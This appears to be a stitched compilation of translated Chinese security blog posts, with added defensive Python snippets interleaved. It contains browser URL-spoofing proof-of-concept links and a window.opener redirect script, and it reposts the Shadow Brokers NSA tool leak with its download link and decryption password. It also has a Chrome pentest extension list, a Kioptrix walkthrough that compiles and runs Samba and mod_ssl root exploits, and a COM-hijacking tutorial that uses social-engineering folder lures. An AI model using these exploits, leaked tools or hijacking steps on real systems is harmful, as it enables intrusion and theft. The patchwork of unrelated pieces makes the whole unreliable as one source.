The China Hacker Cloud platform recently found two 0day spoofing vulnerabilities that affect most browsers.

Both target mainstream browsers.

Because some vendors have not yet released fixes, all tests below were done with Chrome.

0x01

URL spoofing vulnerability in mainstream browsers (1)

Vulnerability principle

Baloch explains on his personal website that the root cause is that Chrome, and Firefox for Android, render certain Unicode characters incorrectly. Arabic and Hebrew contain characters that are displayed from right to left, for example "|". When a URL containing such a Unicode character is combined with an IP address, the browser displays the URL from right to left.

For example, the logical order of a URL may be "127.0.0.1/|/http://example.com/", but the browser shows it in the address bar as "http://example.com/|/127.0.0.1".

The IP-address part of the flipped URL is easy to hide, especially on mobile devices: a sufficiently long URL (google.com/fakepath/fakepath/fakepath/… /127.0.0.1) is all it takes. To make the address look even more genuine, an SSL certificate can be added.

Reproduction

Chrome

(Reproduced successfully by visiting the PoC site with Chrome on Mac, and on an iOS phone. PS: could not be reproduced on PC.)

1) Visit http://182.176.65.7/%EF%B9%B0/http://google.com/test

2) Notice that the browser does not show Google's content, yet the address bar reads http://google.com/test/182.176.65.7
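As an added defensive check, not part of the original post: the Python below (written here) percent-decodes a URL and reports every character whose Unicode bidirectional class can reorder the displayed text, then pairs that with the host the browser will actually contact. The PoC URL from the steps above is used as the sample input; `bidi_risky_chars` and `assess_url` are names chosen for this example.

```python
import unicodedata
from urllib.parse import unquote, urlsplit

# Bidi classes that are right-to-left or that explicitly alter text ordering.
# A URL containing any of these may render differently from its logical order.
REORDERING_BIDI_CLASSES = {
    "R", "AL", "AN",                                                   # RTL letters, Arabic digits
    "RLE", "RLO", "RLI", "LRE", "LRO", "LRI", "FSI", "PDF", "PDI",    # explicit bidi controls
}


def bidi_risky_chars(url):
    """Return each character of the percent-decoded URL that can reorder its display."""
    findings = []
    for index, ch in enumerate(unquote(url)):
        bidi = unicodedata.bidirectional(ch)
        if bidi in REORDERING_BIDI_CLASSES:
            findings.append({
                "index": index,
                "codepoint": ord(ch),
                "name": unicodedata.name(ch, "<unnamed>"),
                "bidi": bidi,
            })
    return findings


def assess_url(url):
    """Pair the host that will really be contacted with any display-reordering characters."""
    findings = bidi_risky_chars(url)
    return {
        "logical_host": urlsplit(url).hostname or "",
        "findings": findings,
        "spoof_risk": bool(findings),
    }


# Sample input taken from the write-up: U+FE70 is percent-encoded as %EF%B9%B0.
POC_URL = "http://182.176.65.7/%EF%B9%B0/http://google.com/test"

if __name__ == "__main__":
    result = assess_url(POC_URL)
    print("host actually contacted:", result["logical_host"])
    for f in result["findings"]:
        print(f"U+{f['codepoint']:04X} {f['name']} (bidi class {f['bidi']}) at offset {f['index']}")
```

The same check works on any URL a mail gateway or link scanner sees; a non-empty `findings` list with a logical host that differs from the text after it is the signal to block or rewrite the link.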

0x02

Website spoofing vulnerability affecting most websites (2)

A foreign researcher recently disclosed a security weakness that most websites ignore: Facebook, Twitter, Google and others were all found to have the target="_blank" flaw.

You can test the issue at http://tvvocold.coding.me/target_blank_vulnerability/. A page opened through a target="_blank" link receives, via the browser's window.opener object, partial control over the original page, which a malicious website can abuse.

<script language="javascript">window.opener.location = 'https://example.com'</script>

Fix: add the rel="noopener noreferrer" attribute to links that use target="_blank".

This "vulnerability" is estimated to affect 99% of websites on the Internet and most browsers. Instagram has fixed it; interestingly, Google declined to, arguing that "this is a browser defect and cannot be meaningfully mitigated by a single website".

A possible exploitation scenario: when a user opens a malicious site's page from Facebook, the malicious page redirects the original tab to a fake Facebook page; when the user returns to the original tab they may not notice that the browser URL has changed, and the fake page can then go on to phish or perform other malicious actions…
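As an added server-side mitigation example, not the original post's code: a small Python filter, written here, that passes an HTML fragment through unchanged except for `<a target="_blank">` elements, which get rel="noopener noreferrer" added (merged with any existing rel tokens). This is the kind of template filter that removes window.opener access site-wide; the sample markup is constructed, and `NoOpenerRewriter` and `add_noopener` are names chosen for this example.

```python
from html import escape
from html.parser import HTMLParser

REQUIRED_REL = ("noopener", "noreferrer")


class NoOpenerRewriter(HTMLParser):
    """Copy HTML through verbatim, rewriting only anchors that open a new browsing context."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.rewritten = 0

    def handle_starttag(self, tag, attrs):
        self.out.append(self._render(tag, attrs, self.get_starttag_text()))

    def handle_startendtag(self, tag, attrs):
        self.out.append(self._render(tag, attrs, self.get_starttag_text()))

    def _render(self, tag, attrs, original):
        target = dict(attrs).get("target") or ""
        if tag != "a" or target.lower() != "_blank":
            return original  # not a new-window link: keep the author's exact markup
        rel_tokens, new_attrs = [], []
        for name, value in attrs:
            if name.lower() == "rel":
                rel_tokens = (value or "").split()
            else:
                new_attrs.append((name, value))
        for token in REQUIRED_REL:  # add what is missing, keep e.g. nofollow
            if token not in (t.lower() for t in rel_tokens):
                rel_tokens.append(token)
        new_attrs.append(("rel", " ".join(rel_tokens)))
        self.rewritten += 1
        rendered = " ".join(
            f'{n}="{escape(v, quote=True)}"' if v is not None else n for n, v in new_attrs
        )
        return f"<a {rendered}>"

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def add_noopener(html):
    """Return (rewritten_html, number_of_anchors_fixed)."""
    parser = NoOpenerRewriter()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.rewritten


# Constructed sample: two new-window links (one already carrying rel) and one same-tab link.
SAMPLE_HTML = (
    '<p>Read <a href="https://example.com/doc" target="_blank">the docs</a> and '
    '<a target="_BLANK" rel="nofollow" href="https://example.org">this</a>; '
    '<a href="/local">same tab</a> is untouched.</p>'
)

if __name__ == "__main__":
    fixed, count = add_noopener(SAMPLE_HTML)
    print(count, "anchor(s) rewritten")
    print(fixed)
```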

Reproduction

Chrome

(Reproduced successfully with Chrome on Mac by visiting the PoC site.)

1) Visit the PoC site in the browser:

http://tvvocold.coding.me/target_blank_vulnerability/ and observe that the original page's URL becomes:

Other platforms not tested :(

Other browsers and websites are also affected, but because the vendors have not yet released fixes, the author cannot disclose the details.

Next week is bound to be eventful: China Hacker Cloud reminds everyone that the Shadow Brokers will shortly release a number of Windows zero-day exploitation tools, and the hacker community will discover a large number of 0day vulnerabilities!

On the evening of April 14 (Beijing time), TheShadowBrokers published on their steemit.com blog the second batch of the hacking toolkit of the Equation Group (the group that conducts espionage abroad on behalf of the NSA). It follows the first batch, the decryption password for the EQGRP-Auction-Files released on April 8 (http://bobao.360.cn/news/detail/4107.html); once again the decryption password was made public at scale, so anyone interested can download and decrypt the files directly.

Original file download address

https://yadi.sk/d/NJqzpqo_3GxZA4

Decryption password

Reeeeeeeeeeeeeee
SHA-256 hashes were published for the three encrypted archives (odd.tar.xz.gpg, swift.tar.xz.gpg, windows.tar.xz.gpg) and for their decrypted .tar.xz counterparts.

Event timeline


1. In August 2016 a hacker group calling itself "Shadow Brokers" claimed to have broken into the Equation Group and stolen a large number of confidential files, part of which it published on the Internet. The Equation Group is said to be a hacking unit under the NSA (US National Security Agency) with extremely advanced capabilities. The published files included quite a few covert underground hacking tools. "Shadow Brokers" kept back the remaining files, intending to sell them at public auction to the highest bidder, asking 1 million bitcoin (worth close to 500 million USD). The tools never sold.

2. On April 8, 2017 (Beijing time), "Shadow Brokers" published the password for the retained archive; someone decrypted it and uploaded the contents to GitHub for download.

3. On the evening of April 14, 2017 (Beijing time), following the earlier password release, "Shadow Brokers" posted on Twitter the second batch of retained files, downloadable from https://yadi.sk/d/NJqzpqo_3GxZA4 with the password "Reeeeeeeeeeeeeee". This batch was found to contain 23 new hacking tools; see https://github.com/misterch0c/shadowbroker/blob/master/file-listing for details.

The tools are named OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit, EnglishMansDentist, MofConfig, ErraticGopher, EmphasisMine, EmeraldThread, EternalSynergy, EwokFrenzy, ZippyBeer, ExplodingCan, DoublePulsar and so on.

Brief analysis

Someone uploaded the decrypted files to GitHub; a quick analysis of all of them found 23 new hacking tools. See https://github.com/misterch0c/shadowbroker/blob/master/file-listing for details.

The second batch of decrypted tools consists of odd.tar.xz.gpg, swift.tar.xz.gpg and windows.tar.xz.gpg:

windows: Windows exploitation tools, implants and some attack code

swift: material relating to attacks on banks

oddjob: documents relating to the ODDJOB backdoor

According to researchers:

The Windows folder contains many hacking tools for the Windows operating system, mainly aimed at older versions (Windows XP) and Server 2003.

Among them, "ETERNALBLUE is a 0day RCE exploit that affects the latest and updated Windows 2008 R2 SERVER VIA SMB and NBT!", as a user named Hacker Fantastic put it on Twitter.

The OddJob folder contains a Windows-based implant together with the specified configuration files and payloads. Although few details of the implant are available, OddJob works on Windows Server 2003 Enterprise (and even Windows XP Professional).


The SWIFT folder contains PowerPoint presentations, evidence, credentials and the internal architecture of EastNets, one of the largest SWIFT service bureaus in the Middle East.


SWIFT (the Society for Worldwide Interbank Financial Telecommunication) is a global financial messaging system through which thousands of banks and organisations worldwide transfer billions of dollars every day.

The folder includes SQL scripts for querying information from Oracle databases, such as lists of database users and SWIFT messages.


In addition, the folder contains Excel files indicating that the NSA's elite cyber-attack unit, the Equation Group, had broken into and gained access to many banks around the world, most of them in the Middle East: the UAE, Kuwait, Qatar, Palestine and Yemen.

Vulnerability impact

According to statistics from the FOFA system, more than 7.5 million Internet-facing hosts worldwide may be affected, over 1.33 million of them in China. Globally about 5.42 million RDP services and about 2.08 million SMB services run on Windows (distribution only, not confirmed vulnerable); in China more than 1.01 million RDP services and more than 320,000 SMB services are exposed to the Internet. According to tests by BaiMaoHui (白帽汇), everything from Windows 2000 to Windows 2008 is affected by this toolkit, with a very high success rate. Moreover, ports 445 and 139 are usually open on internal networks, which makes the toolkit a formidable weapon for penetrating an intranet.

Figure: global distribution of RDP services (distribution only, not confirmed vulnerable)

Figure: distribution of RDP services in China (distribution only, not confirmed vulnerable)

Figure: global distribution of SMB services on Windows (distribution only, not confirmed vulnerable)

Figure: distribution of SMB services on Windows in China (distribution only, not confirmed vulnerable)

Exploitation

Screenshots of the ETERNALBLUE exploit module succeeding against Windows 7 SP1 64-bit and Windows 2003 SP2 32-bit.

Figure: Windows 7 exploited successfully, with a reverse shell

Remediation

1. Upgrade to a Microsoft-supported Windows version and install the patches: https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/

2. Deploy protective measures such as buffer-overflow protection software and antivirus.

3. On Windows versions without a patch, temporarily close ports 135, 137 and 445 and port 3389 (remote login).

Update: EastNets denies that its SWIFT service was compromised

In an official statement released today, EastNets denied that its SWIFT service was affected and described the reports of a hack as "totally false and unfounded".

"The reports of an alleged hacker-compromised EastNets Service Bureau (ENSB) network are totally false and unfounded. The EastNets network internal security unit has run a complete check of its servers and found no hacker compromise or any vulnerabilities."

Extensions to Turn Google Chrome into a Penetration Testing Tool (hackerschina)

Google Chrome is the most popular web browser in the world. It is lightweight and comes with a clean interface, which is the main reason for its popularity. It also has various other features that make browsing easier and faster. Like Firefox, Chrome supports add-ons, called extensions in Chrome. Extensions help us improve the functionality of Google Chrome.

There are thousands of Google Chrome extensions available that add useful tools directly to the browser and reduce the need to install separate tools for those tasks. In previous posts, we covered the Firefox add-ons that make Firefox a security testing tool. Like Firefox, we can also turn Google Chrome into a security tool with a few good security extensions.

In this post, I have collected the extensions that help us in the penetration testing process. All of them are available for free from Google Chrome's Web Store, except for a few that are not in the store and must be downloaded from their official websites.

Note: the tool descriptions are taken from the official release notes.

Google Chrome Extensions for Security researchers and penetration testers

  1. Web Developer is a Google Chrome extension that adds a toolbar with various web development tools to Chrome. With these tools, users can perform various web development tasks. This extension helps in analyzing web application elements such as HTML and JS.
     Add the Web Developer extension to Chrome here: https://chrome.google.com/webstore/detail/web-developer/bfbameneiokkgbdmiekhjnmfkcnldhhm
  2. Firebug Lite for Google Chrome provides a rich visual environment to analyze HTML elements, DOM elements and Box Model shading. It also provides live CSS editing. It helps in analyzing how an application works on the client side.
     Add Firebug Lite to Google Chrome: https://chrome.google.com/webstore/detail/firebug-lite-for-google-c/bmagokdooijbeehmkpknfglimnifench
  3. d3coder is another nice Google Chrome extension that helps penetration testers. It lets us encode and decode selected text via the context menu, which saves the time spent encoding and decoding strings with separate tools. This extension can perform a wide range of functions; see the list below:
    • Timestamp decoding
    • rot13 en-/decoding
    • base64 encoding
    • base64 decoding
    • CRC32 hashing
    • MD5 hashing
    • SHA1 hashing
    • bin2hex
    • bin2txt
    • HTML entity encoding
    • HTML entity decoding
    • HTML special chars encoding
    • HTML special chars decoding
    • URI encoding
    • URI decoding
    • Quoted printable decoding
    • Quoted printable encoding
    • Escapeshellarg
    • Base64 decode
    • Base64 encode
    • Unserialize
    • L33T-en/decode
    • Reverse

     Add the d3coder extension to Google Chrome: https://chrome.google.com/webstore/detail/d3coder/gncnbkghencmkfgeepfaonmegemakcol?hl=en-US

  4. Site Spider is an extension that adds a crawler to Chrome. It crawls all pages and reports all broken links. One can also restrict the spider by adding restrictions and regular expressions; it works on the client side. It can also use your authentication to access all pages. This extension is open source, so you can easily modify it according to your needs.
     Add Site Spider to Google Chrome: https://chrome.google.com/webstore/detail/site-spider/ddlodfbcplakmddhdlffebcggbbighda
  5. Form Fuzzer is used to populate predefined characters into different form fields. It can also select checkboxes, radio buttons and select items in forms. It has a configuration menu where you can manage all settings of the extension. It is really helpful in testing forms: you can set payloads for forms and then populate them quickly with this nice tool. Really helpful in performing XSS and SQL injection attacks.
     Add Form Fuzzer to Google Chrome: https://chrome.google.com/webstore/detail/form-fuzzer/cbpplldpcdcfejdaldmnfhlodoadjhii
  6. Session Manager is a powerful Chrome extension that lets users save, update, restore, and remove sets of tabs. You can create a group of tabs on the same topic and then restore those pages in one click. If you open a few specific pages daily, create a group of those pages and open them with a single click.
     Add Session Manager to Google Chrome: https://chrome.google.com/webstore/detail/session-manager/mghenlmbmjcpehccoangkdpagbcbkdpc
  7. Request Maker is a core penetration testing tool. It is used for creating and capturing requests, tampering with the URL, and making new headers with POST data. It can capture requests made via forms or XMLHttpRequests. As you can see, the function of this tool is similar to Burp. It is also helpful in performing various kinds of attacks on web applications by modifying HTTP requests.
     Add Request Maker to Google Chrome: https://chrome.google.com/webstore/detail/request-maker/kajfghlhfkcocafkcjlajldicbikpgnp
  8. Proxy SwitchySharp is a proxy extension that helps in managing and switching between multiple proxies quickly. It also has an option for automatic proxy switching based on URL. You can also import or export its settings easily. With a proxy switcher, we can hide IP addresses and perform penetration testing tasks to check how a person could attack through proxy servers.
     Add Proxy SwitchySharp to Google Chrome: https://chrome.google.com/webstore/detail/proxy-switchysharp/dpplabbmogkhghncfbfdeeokoefdjegm/details
  9. Cookie Editor is a nice Chrome extension that lets users edit cookies. This tool is really helpful while hijacking vulnerable test sessions. It lets users delete, edit, add and search cookies. It also lets users protect, block or export cookies as JSON. You can play with cookies as you want. This extension is ad-supported and all revenue goes to UNICEF to help children worldwide, but the ads are not necessary and can be disabled at any time from the extension's settings page.
     Add Edit This Cookie to Google Chrome: https://chrome.google.com/webstore/detail/edit-this-cookie/fngmhnnpilhplaeedifhccceomclgfbg
  10. Cache Killer is another nice extension that automatically clears the browser cache before loading pages. It can be easily enabled or disabled with a single mouse click. It is useful for bypassing the browser cache and seeing the website as it currently is when it keeps changing. This is very useful for web developers.
     Add the Cache Killer extension to Google Chrome: https://chrome.google.com/webstore/detail/cache-killer/jpfbieopdmepaolggioebjmedmclkbap
  11. XSS Rays is a nice extension that helps in finding XSS vulnerabilities in a website. It finds how a website filters the code. It also checks for injections and inspects objects. You can also easily extract, view and edit forms non-destructively even if forms cannot be edited. Many penetration testers use this extension as a dedicated XSS testing tool. It is a pure JavaScript XSS scanner. You can read more about XSS Rays here.
     Add XSS Rays to Google Chrome: https://chrome.google.com/webstore/detail/xss-rays/kkopfbcgaebdaklghbnfmjeeonmabidj
  12. WebSecurify is a powerful cross-platform web security testing tool. It is available for various desktop and mobile platforms and browsers. This is the first web security tool that runs directly from the browser. It is capable of finding XSS, XSRF, CSRF, SQL injection, file upload, URL redirection and various other security vulnerabilities. It has a built-in crawler that scans and crawls pages and then tries to find vulnerabilities on them. It is not a fully automatic tool: it lists possible vulnerabilities for the URL, and you will need to confirm each one manually. We have already covered the WebSecurify tool in detail; check older posts to read more on how it works and how to master WebSecurify for penetration testing. While scanning, it pulls all features from the WebSecurify server, so you do not need to worry about database updates; the vulnerability engine is always up to date. Penetration testing tools are just a click away. Use it either as a browser tool or as a desktop tool.
     Add WebSecurify to Google Chrome: https://chrome.google.com/webstore/detail/websecurify/gbecpbaknodhccppnfndfmjifmonefdm
  13. Port Scanner is a Google Chrome extension that adds port scanning capabilities to the browser. With this extension, you will be able to scan which TCP ports are listening. Port Scanner analyzes any given IP or URL address and then scans for open ports to help you secure them. It is also available for Opera and Mozilla Firefox.
     Add Port Scanner to Google Chrome: https://chrome.google.com/webstore/detail/port-scanner/jicgaglejpnmiodpgjidiofpjmfmlgjo
  14. XSS chef is a popular Chrome extension that works directly in the browser. It helps us identify XSS vulnerabilities in a web application. It is similar to BeEF, but for browsers. It performs the following tasks:
    • Monitor open tabs of victims
    • Execute JS on every tab (global XSS)
    • Extract HTML, read/write cookies (also httpOnly), local Storage
    • Get and manipulate browser history
    • Stay persistent until whole browser is closed (or even further if you can persist in extensions' local Storage)
    • Make screenshot of victims window
    • Further exploit e.g. via attaching BeEF hooks, keyloggers etc.
    • Explore filesystem through file:// protocol
    • Bypass Chrome extensions content script sandbox to interact directly with page JS

     This is not an extension but a framework, so installation is not the same as for other extensions. Read the official XSS Chef link below to learn how to install it in Chrome.
     Add XSS chef to Google Chrome: https://github.com/koto/xsschef

  15. HPP Finder is another nice extension. It is useful for finding HTTP Parameter Pollution (HPP) vulnerabilities and exploiting them. This tool can easily detect and exploit HTML forms or URLs that might be susceptible to HTTP Parameter Pollution attacks. It can only find the vulnerable points; it is not a solution against the vulnerability.
     Add HPP Finder to Google Chrome: https://chrome.google.com/webstore/detail/hpp-finder/nogojgcobcolombicplhimbbakkcmhio
  16. The Exploit Database is not a penetration testing tool, but it keeps you updated with all the latest exploits, shellcode and white papers available on the Exploit DB server. It is an open source tool and its source code can be found here: http://github.com/10n1z3d/EDBE
     Add The Exploit Database extension to Chrome: https://chrome.google.com/webstore/detail/the-exploit-database/lkgjhdamnlnhppkolhfiocgnpciaiane
  17. GHDB is a nice Google hacking query search. This extension helps you search for the Google hacking queries needed to find specific pages based on special Google search parameters. It helps you understand the basics of web security better.
     Add GHDB to Google Chrome: https://chrome.google.com/webstore/detail/ghdb/jopoimgcafajndmonondpmlknbahbgdb
  18. iMacros for Chrome: while performing various web page testing processes, you may need to automate a few repetitive tasks on the web. For this, you can use the iMacros for Chrome extension. Next time you need this kind of thing, use a macro and start it with a button click.
     Install iMacros for Chrome: https://chrome.google.com/webstore/detail/imacros-for-chrome/cplklnmnlbnpmjogncfgfijoopmnlemp
  19. IP Address and Domain Information is an information gathering extension that can help you find geolocation, DNS, whois, routing, search results, hosting, domain neighbors, DNSBL, BGP and ASN information for every IP address (IPv4 and IPv6).
     Add it to Chrome: https://chrome.google.com/webstore/detail/ip-address-and-domain-inf/lhgkegeccnckoiliokondpaaalbhafoa

How to Install a Chrome Extension in the browser

Installing an extension is a one-click process if it is available in the official Chrome store. It may be confusing, though, if you only have the extension's code.

Install from the official Chrome store: To install an extension from the official Chrome store, click the link given below each extension to open its Chrome store page. You will see a blue button saying "Add to Chrome."

Figure: Chrome Extension Installation Button

After clicking this button, installation begins and you do not need to do anything else. Chrome downloads a file and adds it to the browser. By default, the extension is activated.

Install an extension manually from a source file: A few extensions are not available in the official Chrome store because they do not meet the store's terms and conditions, so they are distributed unofficially on their own websites. If you want to install one of them, download it from the official website, open Chrome's extensions page, then drag the source file and drop it onto the extensions page. The extension installs automatically after being dropped there.


If you want to deactivate an extension in Chrome, go to Settings and then the Extensions page, where you will see the installed extensions. Next to each extension there is a check box; to disable the extension, simply clear it. To remove the extension permanently, click the trash icon next to the check box.

Figure: Chrome Extension enable/disable

Conclusion

After reading this post, you will know that Chrome is more than just a browser. With these extensions, it becomes a friend of penetration testers and security researchers. Install them in your browser and start your penetration testing process. The tools range from information gathering to performing attacks. A few can be used to gather information and inspect the headers of a request. XSS Rays, XSS Chef, HPP Finder and WebSecurify are the most helpful and most widely used as security tools.

Finally, I have also added exploit tools for searching for vulnerabilities, shells and white papers. You can use the exploit search extension to look up an exploit and use it while performing attacks.

Use these tools and share your experience with us. Share which extension you like most via comments.

Kioptrix: Level 1 – Walkthrough (HackersChina)


Kioptrix: Level 1 surfaced on VulnHub on February 17th, 2010. Created by Kioptrix, it can be found at https://www.vulnhub.com/entry/kioptrix-level-1-1,22/. It is the first machine in the Kioptrix series. The objective is to get root privileges and find root’s email.

For the attacking machine, I will be using Kali 2017.1.

Once booted, this is what the victim machine will look like:

We start the attack by finding the IP of the victim machine using the netdiscover command:

$ netdiscover

Now that we know our target IP, let’s start by scanning the ports and try to get more information about it:

The scan shows us that the following ports are open:

  • Port 22 – Running OpenSSH
  • Port 80 – Running Apache Web server
  • Port 111 – Running RPC
  • Port 139 – Running Samba
  • Port 443 – Running Apache web server over SSL
  • Port 1024 – Running RPC

Upon visiting the web application (on port 80 via http:// and port 443 via https://) we just see a default Test Page:

Moreover, I did not find anything interesting within their source code as well. Going back to see the services that are being run, Samba is something that interests me. So, I run an enumeration on it:

$ enum4linux -a 172.16.92.138 > output.txt

This gives us a lot of information, including the Samba version in use, 2.2.1a. Upon doing a simple exploit search, I see that a Remote Code Execution exploit is available:

$ searchsploit samba 2.2

I copy the exploit to the root directory as exploit.c:

$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c

then I compile the exploit via gcc:

$ gcc -o samba exploit.c

I give the final file the proper permissions:

$ chmod 755 samba

Let’s dry run the exploit and see what all parameters are required:

Okay then, I think we are ready to use this:

$ ./samba -b 0 -c 172.16.92.133 172.16.92.138

And we are in with root privileges! Now we need to find the email.

I found the email under /var/mail:


While playing around with it some more, I found that the machine could be exploited another way via Metasploit (CVE-2003-201):

$ use exploit/linux/samba/trans2open

Another way of getting into the machine was via a mod_ssl exploit (CVE-2002-0082). I found its exploit at https://www.exploit-db.com/exploits/764/

$ gcc -o OpenFuck 746.c -lcrypto

Note: Since the exploit is old, you can update it by following this tutorial: http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. Also, keep in mind that you will need libssl and libssl-dev before you compile the exploit.

Let’s exploit!

$ ./OpenFuck 0x6b 172.16.92.138 443 -c 40

China Hacker Cloud teaches you a powerful new way to exploit COM hijacking!

Run a chosen program just by opening a folder? This is no fairy tale; it really exists. With the COM hijacking technique discussed in this article, running chosen code as soon as a folder is opened is easy to achieve. There is very little Chinese-language material explaining how COM hijacking works, so this article summarises the technique based on the author's own analysis. At the same time, we hope the major security vendors will build protection against this kind of abuse to keep users' information safe.

Preface

As the saying goes, "when you curse, curse the mother first; when you catch thieves, catch the ringleader first", so let us start with what readers care about most: a demonstration of the folder-hijacking exploit in action:

Run code just by opening a folder? A new way to exploit COM hijacking

To understand this article, we first need a few basic COM concepts:

  • Interface: a collection of functions, also called "methods". Interface names all start with "I", for example "IShellFolder". Interfaces can inherit from one another.
  • Component object class (coclass): the component itself. A component lives in a DLL or EXE file and contains the implementation code of one or more interfaces; it implements every interface it contains.
  • COM object: an instance of a component.
  • COM server: a DLL or EXE file containing one or more components.
  • COM library: part of the operating system, responsible for servicing user programs.
  • GUID: a unique 128-bit identifier for an object (globally unique identifier), a single unique ID much like a physical network address.
  • CLSID: class ID, uniquely identifies a component.
  • IID: interface ID, identifies an interface.

In addition, Windows has virtual folders: Control Panel, My Computer and others are all virtual folders of the system. Each virtual folder has a corresponding CLSID in the registry; for example, My Computer is {20D04FE0-3AEA-1069-A2D8-08002B30309D} and Control Panel is {21EC2020-3AEA-1069-A2DD-08002B30309D}.

So how can these virtual folders be opened? Taking "My Computer" as an example, entering "::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" in Start – Run opens My Computer. Note, however, that on Windows 7 entering ::{21EC2020-3AEA-1069-A2DD-08002B30309D} opens Control Panel, whereas on XP the command to open Control Panel is "::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}".

Exploitation method

For the demonstration, the code we execute pops up a dialog like the one below, showing the path and PID of the process that loaded the DLL.

Putting an elephant in a fridge takes three steps, and so does our exploitation:

1. Choose the CLSID carefully. Prefer a CLSID that the system uses widely, so that the module is loaded whenever the system performs many of its functions.

The CLSID we chose is {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}, which corresponds to the CAccPropServicesClass class.

Modify the registry so that the DLL registered for this CLSID is replaced by a file that implements the required behaviour (this file is carefully constructed by us; otherwise the exploit will not succeed).

This can be done by importing the following data into the registry:

2. Create a new folder whose name ends with the CLSID as its extension, and copy our exploit DLL into the system directory:

The folder name is where imagination (deception) comes in: use social engineering to pick a tempting name. For instance, if the target likes Japanese girls, call the folder "小泽にほんごかなニホンゴ(カナ).{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}".

3. Open the folder and the exploit succeeds.

The steps are simple; the crucial parts are the DLL that implements our code and the choice of CLSID. This is no ordinary DLL but a "combat DLL": it implements a COM interface, and there are special requirements on the return values of its exported functions. See the code in the attachment at the end of the article.
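As an added detection example aimed at the vendors the article addresses, not code from the original post: the Python below (written here) parses the subset of .reg syntax used for COM registration and flags InprocServer32 registrations under the user-writable HKEY_CURRENT_USER hive, which is how a per-user CLSID entry shadows the machine-wide class; a second helper recognises Explorer folder names carrying a ".{CLSID}" suffix like the one in step 2. The .reg text and folder names are constructed samples (the CLSID is the one named in step 1, the DLL path is a placeholder); `parse_reg`, `clsid_folder_suffix` and `find_hijack_indicators` are names chosen for this example.

```python
import re

# {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
CLSID_RE = re.compile(r"\{[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}\}", re.I)
REG_KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
REG_VALUE_RE = re.compile(r'^(?:@|"(?P<name>[^"]+)")="(?P<data>.*)"$')
INPROC_RE = re.compile(r"\\CLSID\\(?P<clsid>\{[0-9a-f-]{36}\})\\InprocServer32$", re.I)


def parse_reg(text):
    """Parse .reg keys and REG_SZ values into {key: {value_name: data}} ('@' is the default value)."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        key_match = REG_KEY_RE.match(line)
        if key_match:
            current = key_match.group("key")
            keys.setdefault(current, {})
            continue
        value_match = REG_VALUE_RE.match(line)
        if value_match and current is not None:
            name = value_match.group("name") or "@"
            # .reg escapes backslashes in string data as '\\'
            keys[current][name] = value_match.group("data").replace("\\\\", "\\")
    return keys


def clsid_folder_suffix(folder_name):
    """Return the CLSID if a folder name ends in '.{CLSID}' (Explorer treats it as that class), else None."""
    _, dot, suffix = folder_name.rpartition(".")
    return suffix if dot and CLSID_RE.fullmatch(suffix) else None


def find_hijack_indicators(reg_text):
    """Flag InprocServer32 registrations that live in HKCU, where any user can write them."""
    findings = []
    for key, values in parse_reg(reg_text).items():
        match = INPROC_RE.search(key)
        if not match or "@" not in values:
            continue
        if key.upper().startswith("HKEY_CURRENT_USER\\"):
            findings.append({
                "clsid": match.group("clsid").lower(),
                "dll": values["@"],
                "reason": "per-user CLSID registration shadows the HKLM class (COM hijack)",
            })
    return findings


# Constructed sample export: one HKCU registration of the CLSID from step 1 pointing at a
# placeholder DLL, plus a machine-wide entry that should not be flagged.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}]
@="CAccPropServicesClass"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32]
@="C:\\Users\\victim\\AppData\\Roaming\\hijack.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InprocServer32]
@="C:\\Windows\\System32\\shell32.dll"
"""

if __name__ == "__main__":
    for hit in find_hijack_indicators(SAMPLE_REG):
        print(f"{hit['clsid']} -> {hit['dll']}: {hit['reason']}")
    for name in ("Invoice.{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}", "Invoice.docx"):
        print(name, "->", clsid_folder_suffix(name))
```

On a live system the same checks can be fed from a `reg export HKCU\Software\Classes\CLSID` dump and a directory listing, and a folder suffix that resolves to a CLSID registered only in HKCU is the combination the article describes.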

The story behind it

From the figures above you can see that our DLL is in fact loaded by verclsid.exe, and verclsid.exe is started by a function in shell32.dll. Only after SHExtCoCreateInstance in shell32.dll has been called successfully is verclsid.exe loaded.

SHExtCoCreateInstance is merely a wrapper around _SHExtCoCreateInstance2.

In IDA we can see that _SHExtCoCreateInstance2 calls _ShouldLoadShellExt, and only if _ShouldLoadShellExt returns success (a non-zero value) is verclsid.exe loaded.

_ShouldLoadShellExt checks the registry keys Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked and Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved and then calls _QueryClassInterface; for _QueryClassInterface to return a non-zero value, the only way is through the v17 = ExitCode == 0 code shown in the figure below.

Putting the whole process together: for the exploit to succeed, all that is needed is for the exit code of the verclsid.exe process launched by CreateProcessW to be 0.

Analysis of verclsid.exe

The arguments passed to verclsid.exe are:

